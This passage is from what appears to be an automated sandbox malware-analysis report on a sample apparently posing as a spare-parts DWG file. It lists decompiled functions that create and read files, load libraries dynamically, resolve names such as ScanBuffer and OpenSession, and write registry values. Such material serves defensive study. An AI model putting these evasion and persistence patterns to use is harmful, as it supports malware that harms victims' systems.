                                                                							 *(__ebx + 4) = __edx;
                                                                							 *__ebx = 0;
                                                                							__eax = 0;
                                                                							__eflags = 0;
                                                                							_pop(__ebx);
                                                                							return 0;
                                                                						} else {
                                                                							__eax = 0;
                                                                							__eflags = 0;
                                                                							 *__ebx = __al;
                                                                							_pop(__ebx);
                                                                							return 0;
                                                                						}
                                                                					}
                                                                				}
                                                                			}























                                                                APIs
                                                                • Sleep.KERNEL32(00000000,?,?,00000000,02512014), ref: 02511B47
                                                                • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02512014), ref: 02511B61
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 6e8518d756518286c69417c02e5673826ee16e31272b593fb2b32881dfc6226d
                                                                • Instruction ID: ac1b31b3ab051b9c35779463bf31cf9de2e8678b5cd28cb940c98389dec58444
                                                                • Opcode Fuzzy Hash: 6e8518d756518286c69417c02e5673826ee16e31272b593fb2b32881dfc6226d
                                                                • Instruction Fuzzy Hash: 2351EF71600A418FEB158F6CD988765BFE0BB85314F18C6EAD649CB382E7B0D845CB99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                [Graph not reproduced: control flow of the function at 25135dc, with executed and not-executed blocks marked; nodes reference CreateFileA, GetStdHandle and GetLastError.]
                                                                C-Code - Quality: 72%
                                                                			E025135DC(void** __eax, void* __ecx, void* __edx) {
                                                                				void* _t15;
                                                                				long _t16;
                                                                				long _t18;
                                                                				void** _t22;
                                                                				long _t24;
                                                                				signed int _t29;
                                                                				long _t32;
                                                                				void* _t33;
                                                                				void* _t34;
                                                                				void* _t35;
                                                                				void* _t37;
                                                                
                                                                				_t37 = __edx;
                                                                				_t33 = __ecx;
                                                                				_t22 = __eax;
                                                                				if(0xffffffffffff2850 == 0) {
                                                                					L4:
                                                                					_t22[1] = 0xd7b3;
                                                                					_t22[2] = _t37;
                                                                					_t22[9] = E025135B4;
                                                                					_t22[7] = E025130E4;
                                                                					if(_t22[0x12] == 0) {
                                                                						_t22[9] = E025130E4;
                                                                						if(_t33 == 3) {
                                                                							_t15 = GetStdHandle(0xfffffff5);
                                                                						} else {
                                                                							_t15 = GetStdHandle(0xfffffff6);
                                                                						}
                                                                					} else {
                                                                						_t18 = 0xc0000000;
                                                                						_t29 =  *0x252d00c; // 0x0
                                                                						_t32 =  *(((_t29 & 0x00000070) >> 2) + 0x252d758);
                                                                						_t24 = 2;
                                                                						_t34 = _t33 - 3;
                                                                						if(_t34 != 0) {
                                                                							_t24 = 3;
                                                                							_t35 = _t34 + 1;
                                                                							if(_t35 != 0) {
                                                                								_t18 = 0x40000000;
                                                                								_t22[1] = 0xd7b2;
                                                                								if(_t35 + 1 != 0) {
                                                                									_t18 = 0x80000000;
                                                                									_t22[1] = 0xd7b1;
                                                                								}
                                                                							}
                                                                						}
                                                                						_t11 =  &(_t22[0x12]); // 0x256d940
                                                                						_t15 = CreateFileA(_t11, _t18, _t32, 0, _t24, 0x80, 0); // executed
                                                                					}
                                                                					if(_t15 == 0xffffffff) {
                                                                						_t22[1] = 0xd7b0;
                                                                						_t16 = GetLastError();
                                                                						L18:
                                                                						return E02512D48(_t16);
                                                                					} else {
                                                                						 *_t22 = _t15;
                                                                						return _t15;
                                                                					}
                                                                				}
                                                                				if(0xffffffffffff2850 > 3) {
                                                                					_t16 = 0x66;
                                                                					goto L18;
                                                                				}
                                                                				if( *((intOrPtr*)(__eax + 0x24))() != 0) {
                                                                					E02512D48(_t20);
                                                                				}
                                                                				goto L4;
                                                                			}

                                                                APIs
                                                                • CreateFileA.KERNEL32(C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe,C0000000,?,00000000,00000002,00000080,00000000,?,?,?,025136D5,02526CE7,ScanBuffer,0252AD5C,OpenSession,0252AD5C), ref: 02513677
                                                                • GetStdHandle.KERNEL32(000000F5,?,?,?,025136D5,02526CE7,ScanBuffer,0252AD5C,OpenSession,0252AD5C,ScanBuffer,0252AD5C,0256D8E0,ScanBuffer,0252AD5C,ScanString), ref: 02513697
                                                                • GetLastError.KERNEL32(000000F5,?,?,?,025136D5,02526CE7,ScanBuffer,0252AD5C,OpenSession,0252AD5C,ScanBuffer,0252AD5C,0256D8E0,ScanBuffer,0252AD5C,ScanString), ref: 025136AB
                                                                Strings
                                                                • C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe, xrefs: 02513676
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateErrorFileHandleLast
                                                                • String ID: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                                • API String ID: 1572049330-1835102459
                                                                • Opcode ID: 2350a4bbf1ab361630e19b289d25203fcba38d35c3f400c515714f14612e5975
                                                                • Instruction ID: b9597b954893bc0a1f332a745c1bd97134715c4c19c3e526ac83c219c859c7c9
                                                                • Opcode Fuzzy Hash: 2350a4bbf1ab361630e19b289d25203fcba38d35c3f400c515714f14612e5975
                                                                • Instruction Fuzzy Hash: F911E7A1200201BAFB24DF1CC998766BE95BF85258F28C3D6D6088F3A9EA35C844C75D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                C-Code - Quality: 84%
                                                                			E02522A48(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, signed short _a8) {
                                                                				char _v5;
                                                                				char _v12;
                                                                				char _v16;
                                                                				char _v20;
                                                                				char _v24;
                                                                				char _v28;
                                                                				char _v32;
                                                                				char _v36;
                                                                				char _v40;
                                                                				void* _t29;
                                                                				void* _t51;
                                                                				void* _t65;
                                                                				void* _t66;
                                                                				intOrPtr _t70;
                                                                				intOrPtr _t72;
                                                                				char _t73;
                                                                				intOrPtr _t77;
                                                                				void* _t89;
                                                                				void* _t91;
                                                                				void* _t92;
                                                                				intOrPtr _t93;
                                                                
                                                                				_t73 = __edx;
                                                                				_t66 = __ecx;
                                                                				_t91 = _t92;
                                                                				_t93 = _t92 + 0xffffffdc;
                                                                				_v36 = 0;
                                                                				_v40 = 0;
                                                                				_v28 = 0;
                                                                				_v32 = 0;
                                                                				if(__edx != 0) {
                                                                					_t93 = _t93 + 0xfffffff0;
                                                                					_t29 = E02513EA8(_t29, _t91);
                                                                				}
                                                                				_t89 = _t66;
                                                                				_v5 = _t73;
                                                                				_t65 = _t29;
                                                                				_t87 = _a8;
                                                                				_push(_t91);
                                                                				_push(0x2522b90);
                                                                				_push( *[fs:eax]);
                                                                				 *[fs:eax] = _t93;
                                                                				if(_a8 != 0xffff) {
                                                                					E02522940(E02518010(_t89, _t87 & 0x0000ffff), 0);
                                                                					if( *((intOrPtr*)(_t65 + 4)) < 0) {
                                                                						E02518218(_t89,  &_v36);
                                                                						_v24 = _v36;
                                                                						_v20 = 0xb;
                                                                						E0251A984(GetLastError(),  &_v40);
                                                                						_v16 = _v40;
                                                                						_v12 = 0xb;
                                                                						_t70 =  *0x2569c04; // 0x251ff20
                                                                						E0251B290(_t65, _t70, 1, _t87, _t89, 1,  &_v24);
                                                                						E0251425C();
                                                                					}
                                                                				} else {
                                                                					_t51 = CreateFileA(E02514D64(_t89), 0xc0000000, 0, 0, 2, 0x80, 0); // executed
                                                                					E02522940(_t51, 0);
                                                                					if( *((intOrPtr*)(_t65 + 4)) < 0) {
                                                                						E02518218(_t89,  &_v28);
                                                                						_v24 = _v28;
                                                                						_v20 = 0xb;
                                                                						E0251A984(GetLastError(),  &_v32);
                                                                						_v16 = _v32;
                                                                						_v12 = 0xb;
                                                                						_t72 =  *0x2569de0; // 0x251ff18
                                                                						E0251B290(_t65, _t72, 1, _t87, _t89, 1,  &_v24);
                                                                						E0251425C();
                                                                					}
                                                                				}
                                                                				_t27 = _t65 + 8; // 0x2520830
                                                                				E025148F4(_t27, _t89);
                                                                				_pop(_t77);
                                                                				 *[fs:eax] = _t77;
                                                                				_push(E02522B97);
                                                                				return E025148C4( &_v40, 4);
                                                                			}

                                                                APIs
                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02522B90,?,?,02520828,00000001), ref: 02522AA4
                                                                • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02522B90,?,?,02520828,00000001), ref: 02522AD2
                                                                  • Part of subcall function 02518010: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02520828,02522B12,00000000,02522B90,?,?,02520828), ref: 0251805E
                                                                  • Part of subcall function 02518218: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02520828,02522B2D,00000000,02522B90,?,?,02520828,00000001), ref: 02518237
                                                                • GetLastError.KERNEL32(00000000,02522B90,?,?,02520828,00000001), ref: 02522B37
                                                                  • Part of subcall function 0251A984: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0251C56D,00000000,0251C5C7), ref: 0251A9A3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                • String ID:
                                                                • API String ID: 503785936-0
                                                                • Opcode ID: f69e0269e5e197c0885c38396cc836421caece2097316076ca84f6c9ee38b272
                                                                • Instruction ID: 4d4ee7f92ad45908bfffaef58f880171bf3b363e5c77a07817e727a7ad622e3a
                                                                • Opcode Fuzzy Hash: f69e0269e5e197c0885c38396cc836421caece2097316076ca84f6c9ee38b272
                                                                • Instruction Fuzzy Hash: 8D316474A006199BEB10DFA8C880BEEBBF6BF89710F508565D904E72C0D7755948CFA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                C-Code - Quality: 77%
                                                                			E025236CC(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __esi) {
                                                                				intOrPtr _v8;
                                                                				intOrPtr _v12;
                                                                				char _v16;
                                                                				char _t21;
                                                                				struct HINSTANCE__* _t26;
                                                                				CHAR* _t29;
                                                                				struct HINSTANCE__* _t30;
                                                                				_Unknown_base(*)()* _t31;
                                                                				intOrPtr _t43;
                                                                				CHAR* _t47;
                                                                				void* _t50;
                                                                
                                                                				_v16 = 0;
                                                                				_v12 = __edx;
                                                                				_v8 = __eax;
                                                                				E02514D54(_v8);
                                                                				E02514D54(_v12);
                                                                				_push(_t50);
                                                                				_push(0x2523792);
                                                                				_push( *[fs:eax]);
                                                                				 *[fs:eax] = _t50 + 0xfffffff4;
                                                                				_t47 = E02514D64(_v8);
                                                                				E02514A98( &_v16, _t47);
                                                                				_t21 = _v16;
                                                                				E0251CAB0(_t21, 0, 0x8000); // executed
                                                                				if(_t21 != 0) {
                                                                					 *0x256d2f8 = GetModuleHandleA(_t47);
                                                                					if( *0x256d2f8 != 0) {
                                                                						_t29 = E02514D64(_v12);
                                                                						_t30 =  *0x256d2f8; // 0x77cd0000
                                                                						_t31 = GetProcAddress(_t30, _t29); // executed
                                                                						 *0x256d2fc = _t31;
                                                                						if( *0x256d2fc != 0) {
                                                                						}
                                                                						E025236A0(0x2516a10);
                                                                					}
                                                                					_t26 =  *0x256d2f8; // 0x77cd0000
                                                                					FreeLibrary(_t26); // executed
                                                                				}
                                                                				_pop(_t43);
                                                                				 *[fs:eax] = _t43;
                                                                				_push(E02523799);
                                                                				return E025148C4( &_v16, 3);
                                                                			}















                                                                APIs
                                                                  • Part of subcall function 0251CAB0: SetErrorMode.KERNEL32 ref: 0251CABA
                                                                  • Part of subcall function 0251CAB0: LoadLibraryA.KERNEL32(00000000,00000000,0251CB04,?,00000000,0251CB22), ref: 0251CAE9
                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,02523792), ref: 02523725
                                                                • GetProcAddress.KERNEL32(77CD0000,00000000), ref: 02523748
                                                                • FreeLibrary.KERNEL32(77CD0000,00000000,00000000,02523792), ref: 02523772
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Library$AddressErrorFreeHandleLoadModeModuleProc
                                                                • String ID:
                                                                • API String ID: 2211333376-0
                                                                • Opcode ID: 8bdb3600d43d85e268862af31ceb3b30f30a7643fd2c44090020c7ec005d0c84
                                                                • Instruction ID: 23439601bc95cef1816198cb30c9163ad26ab69f6118bab9bbb850d7f40f9499
                                                                • Opcode Fuzzy Hash: 8bdb3600d43d85e268862af31ceb3b30f30a7643fd2c44090020c7ec005d0c84
                                                                • Instruction Fuzzy Hash: 7D1142B0A41115AFEB04EF69D884A9EB7B9FB85700F5149B5E424D3390DB34DA44DF1C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                C-Code - Quality: 71%
                                                                			E02525CC8(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, int _a4) {
                                                                				intOrPtr _v8;
                                                                				char _v12;
                                                                				void* _v16;
                                                                				int _t27;
                                                                				char* _t29;
                                                                				void* _t43;
                                                                				intOrPtr _t49;
                                                                				void* _t53;
                                                                
                                                                				_v12 = __ecx;
                                                                				_v8 = __edx;
                                                                				_t43 = __eax;
                                                                				E02514D54(_v8);
                                                                				E02514D54(_v12);
                                                                				E02514D54(_a4);
                                                                				_push(_t53);
                                                                				_push(0x2525d6a);
                                                                				_push( *[fs:eax]);
                                                                				 *[fs:eax] = _t53 + 0xfffffff4;
                                                                				RegOpenKeyA(_t43, E02514D64(_v8),  &_v16); // executed
                                                                				_t27 = _a4;
                                                                				if(_t27 != 0) {
                                                                					_t27 =  *(_t27 - 4);
                                                                				}
                                                                				_t29 = E02514DBC( &_a4);
                                                                				RegSetValueExA(_v16, E02514D64(_v12), 0, 1, _t29, _t27); // executed
                                                                				RegCloseKey(_v16);
                                                                				_pop(_t49);
                                                                				 *[fs:eax] = _t49;
                                                                				_push(E02525D71);
                                                                				E025148C4( &_v12, 2);
                                                                				return E025148A0( &_a4);
                                                                			}












                                                                APIs
                                                                • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 02525D0B
                                                                • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,?,00000000,02525D6A), ref: 02525D39
                                                                • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,?,00000000,02525D6A), ref: 02525D42
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenValue
                                                                • String ID:
                                                                • API String ID: 779948276-0
                                                                • Opcode ID: 591d6ee962721239b2de3f6cb3433d58e524217aa4b675932b9e73c5ddcd8490
                                                                • Instruction ID: 37439c1c2cd4294e413061efcf667eb3c7dcd545bca9ee773ab9cacb5ae4304c
                                                                • Opcode Fuzzy Hash: 591d6ee962721239b2de3f6cb3433d58e524217aa4b675932b9e73c5ddcd8490
                                                                • Instruction Fuzzy Hash: C511DA71A00249BFEB00EBA8C881A9E77FDFB89710F504471F514D7290EB30AA45DE58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 55%
                                                                			E02525698(char __eax, void* __ebx, char __edx, void* __esi) {
                                                                				char _v8;
                                                                				char _v12;
                                                                				void* _t16;
                                                                				char _t17;
                                                                				void* _t25;
                                                                				intOrPtr _t29;
                                                                				void* _t35;
                                                                
                                                                				_v12 = __edx;
                                                                				_v8 = __eax;
                                                                				E02514D54(_v8);
                                                                				E02514D54(_v12);
                                                                				_push(_t35);
                                                                				_push(0x2525715);
                                                                				_push( *[fs:eax]);
                                                                				 *[fs:eax] = _t35 + 0xfffffff8;
                                                                				_push(0);
                                                                				_t16 = E02514D64(_v12);
                                                                				_push(_t16); // executed
                                                                				L025169F0(); // executed
                                                                				_t25 = _t16;
                                                                				_t17 = _v8;
                                                                				if(_t17 != 0) {
                                                                					_t17 =  *((intOrPtr*)(_t17 - 4));
                                                                				}
                                                                				_push(_t17);
                                                                				_push(E02514DBC( &_v8));
                                                                				_push(_t25); // executed
                                                                				L025169F8(); // executed
                                                                				L025169E8();
                                                                				_t29 = _t25;
                                                                				 *[fs:eax] = _t29;
                                                                				_push(E0252571C);
                                                                				return E025148C4( &_v12, 2);
                                                                			}











                                                                APIs
                                                                • _lcreat.KERNEL32(00000000,00000000), ref: 025256CF
                                                                • _lwrite.KERNEL32(00000000,00000000,?,00000000,02525715), ref: 025256EF
                                                                • _lclose.KERNEL32(00000000), ref: 025256F5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _lclose_lcreat_lwrite
                                                                • String ID:
                                                                • API String ID: 381991513-0
                                                                • Opcode ID: a1bebb810ca40903b7c03dc6b3bcfda44c30777bcebd148cec6ed444b5ed7d3d
                                                                • Instruction ID: ddb6130a8e295dd39aa111828b2714d3f790e84c3e0258f2dbc07e536c2e1e6b
                                                                • Opcode Fuzzy Hash: a1bebb810ca40903b7c03dc6b3bcfda44c30777bcebd148cec6ed444b5ed7d3d
                                                                • Instruction Fuzzy Hash: 9E014F70600259AFFB14EBB8CC91A9E7BFDFB85710F5105B0E805E7290EB349E00DA58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E025133C4(void** __eax, void* __edx, intOrPtr _a4, void* _a8, signed int _a12, intOrPtr* _a16) {
                                                                				long _v8;
                                                                				void** _t47;
                                                                				signed int _t48;
                                                                				signed int _t58;
                                                                
                                                                				_t58 = _t48;
                                                                				_t47 = __eax;
                                                                				if(_a12 != (__eax[1] & 0x0000ffff & _a12)) {
                                                                					E02512D48(0x67);
                                                                					_v8 = 0;
                                                                				} else {
                                                                					if(ReadFile( *__eax, __edx, __eax[2] * _t58,  &_v8, 0) != 0) {
                                                                						_v8 = _v8 /  *(_t47 + 8);
                                                                						if(_a16 == 0) {
                                                                							if(_t58 != _v8) {
                                                                								E02512D48(_a4);
                                                                								_v8 = 0;
                                                                							}
                                                                						} else {
                                                                							 *_a16 = _v8;
                                                                						}
                                                                					} else {
                                                                						E02512D48(GetLastError());
                                                                						_v8 = 0;
                                                                					}
                                                                				}
                                                                				return _v8;
                                                                			}








                                                                APIs
                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 025133EE
                                                                • GetLastError.KERNEL32(?,?,?,00000000), ref: 025133F5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorFileLastRead
                                                                • String ID:
                                                                • API String ID: 1948546556-0
                                                                • Opcode ID: 22a1d6d18d8b963c772863b4da52e3d03dd5dd3f5047bdda74a2c3ee1410426e
                                                                • Instruction ID: 4e4a7eb009dc623a8d805feb8e91bcd9d8627908e10fbe668e223427cf8e0bcc
                                                                • Opcode Fuzzy Hash: 22a1d6d18d8b963c772863b4da52e3d03dd5dd3f5047bdda74a2c3ee1410426e
                                                                • Instruction Fuzzy Hash: 37114271704159FFEB40DFA9D985A9EBBF9FF88250B1084A6E808DB200E770DE01DB65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 92%
                                                                			E025133C2(void** __eax, void* __edx, intOrPtr _a4, void* _a8, signed int _a12, intOrPtr* _a16) {
                                                                				long _v8;
                                                                				void** _t48;
                                                                				signed int _t50;
                                                                				signed int _t64;
                                                                
                                                                				_push(_t50);
                                                                				_t64 = _t50;
                                                                				_t48 = __eax;
                                                                				if(_a12 != (__eax[1] & 0x0000ffff & _a12)) {
                                                                					E02512D48(0x67);
                                                                					_v8 = 0;
                                                                				} else {
                                                                					if(ReadFile( *__eax, __edx, __eax[2] * _t64,  &_v8, 0) != 0) {
                                                                						_v8 = _v8 /  *(_t48 + 8);
                                                                						if(_a16 == 0) {
                                                                							if(_t64 != _v8) {
                                                                								E02512D48(_a4);
                                                                								_v8 = 0;
                                                                							}
                                                                						} else {
                                                                							 *_a16 = _v8;
                                                                						}
                                                                					} else {
                                                                						E02512D48(GetLastError());
                                                                						_v8 = 0;
                                                                					}
                                                                				}
                                                                				return _v8;
                                                                			}








                                                                APIs
                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 025133EE
                                                                • GetLastError.KERNEL32(?,?,?,00000000), ref: 025133F5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorFileLastRead
                                                                • String ID:
                                                                • API String ID: 1948546556-0
                                                                • Opcode ID: 82c66a6fbf721316cbf553693feb014f68e50e6b623acd09d83354257e4af27e
                                                                • Instruction ID: 5d061a235ec9b4f4d206ca15fbcbb672082cc4f44a85b40da19c17222734a69a
                                                                • Opcode Fuzzy Hash: 82c66a6fbf721316cbf553693feb014f68e50e6b623acd09d83354257e4af27e
                                                                • Instruction Fuzzy Hash: B2F05471704129BFE704DAAADC85FAABBECEF94660B1084A6F908CB100E670DD00C674
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E02512FC4(intOrPtr __eax, intOrPtr* __edx) {
                                                                				char _v276;
                                                                				CHAR* _t7;
                                                                				long _t9;
                                                                				intOrPtr* _t12;
                                                                				void* _t13;
                                                                				CHAR* _t18;
                                                                				intOrPtr _t19;
                                                                				void* _t20;
                                                                
                                                                				_t12 = __edx;
                                                                				_t19 = __eax;
                                                                				E025148A0(__edx);
                                                                				_t21 = _t19;
                                                                				if(_t19 == 0) {
                                                                					_t9 = GetModuleFileNameA(0,  &_v276, 0x105); // executed
                                                                					return E02514990(_t12, _t9, _t20, _t21);
                                                                				}
                                                                				_t18 = GetCommandLineA();
                                                                				while(1) {
                                                                					_t7 = E02512EC8(_t18, _t13, _t12);
                                                                					_t18 = _t7;
                                                                					__eflags = _t19;
                                                                					if(_t19 == 0) {
                                                                						break;
                                                                					}
                                                                					__eflags =  *_t12;
                                                                					if( *_t12 != 0) {
                                                                						_t19 = _t19 - 1;
                                                                						continue;
                                                                					}
                                                                					break;
                                                                				}
                                                                				return _t7;
                                                                			}












                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,00000000), ref: 02512FE8
                                                                • GetCommandLineA.KERNEL32(?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,00000000,0252A8DA), ref: 02512FFA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CommandFileLineModuleName
                                                                • String ID:
                                                                • API String ID: 2151003578-0
                                                                • Opcode ID: 255ad70dfb8b58ca78ae26882bd6932ebd82c777822cb73abc3a05c11e3e8446
                                                                • Instruction ID: 999c96400483fdcd5ede657db96c4d63bdb10fb9813d60a08d9e798f8fbfd91c
                                                                • Opcode Fuzzy Hash: 255ad70dfb8b58ca78ae26882bd6932ebd82c777822cb73abc3a05c11e3e8446
                                                                • Instruction Fuzzy Hash: 3BF02023F0062233F322A16CCC4077E29C67BC87A1F4501B0A909CB280EA60CE0857DA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 34%
                                                                			E0251CAAE(void* __eax, void* __ebx, int __edx) {
                                                                				struct HINSTANCE__* _v12;
                                                                				int _v16;
                                                                				int _t4;
                                                                				struct HINSTANCE__* _t9;
                                                                				void* _t12;
                                                                				intOrPtr _t17;
                                                                				void* _t19;
                                                                				void* _t20;
                                                                				intOrPtr _t21;
                                                                
                                                                				_t19 = _t20;
                                                                				_t21 = _t20 + 0xfffffff4;
                                                                				_t12 = __eax;
                                                                				_t4 = SetErrorMode(__edx); // executed
                                                                				_v16 = _t4;
                                                                				_push(_t19);
                                                                				_push(0x251cb22);
                                                                				_push( *[fs:eax]);
                                                                				 *[fs:eax] = _t21;
                                                                				asm("fnstcw word [ebp-0x2]");
                                                                				_push(_t19);
                                                                				_push(0x251cb04);
                                                                				_push( *[fs:eax]);
                                                                				 *[fs:eax] = _t21;
                                                                				_t9 = LoadLibraryA(E02514D64(_t12)); // executed
                                                                				_v12 = _t9;
                                                                				_pop(_t17);
                                                                				 *[fs:eax] = _t17;
                                                                				_push(E0251CB0B);
                                                                				asm("fclex");
                                                                				asm("fldcw word [ebp-0x2]");
                                                                			}













                                                                APIs
                                                                • SetErrorMode.KERNEL32 ref: 0251CABA
                                                                • LoadLibraryA.KERNEL32(00000000,00000000,0251CB04,?,00000000,0251CB22), ref: 0251CAE9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLibraryLoadMode
                                                                • String ID:
                                                                • API String ID: 2987862817-0
                                                                • Opcode ID: 592e1fb937993f14e8f4d33655fe9fe63bd9786b9658b219456f27072c75d9b7
                                                                • Instruction ID: 66df6d8b922355f0307dec2a7991820253199619d3b2a62ca0881bc9c36b1108
                                                                • Opcode Fuzzy Hash: 592e1fb937993f14e8f4d33655fe9fe63bd9786b9658b219456f27072c75d9b7
                                                                • Instruction Fuzzy Hash: 96F05E70614704BFFB115F75CC5182ABBBDF749B1078248B1E801D2A50E5399C20C969
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • SetErrorMode.KERNEL32 ref: 0251CABA
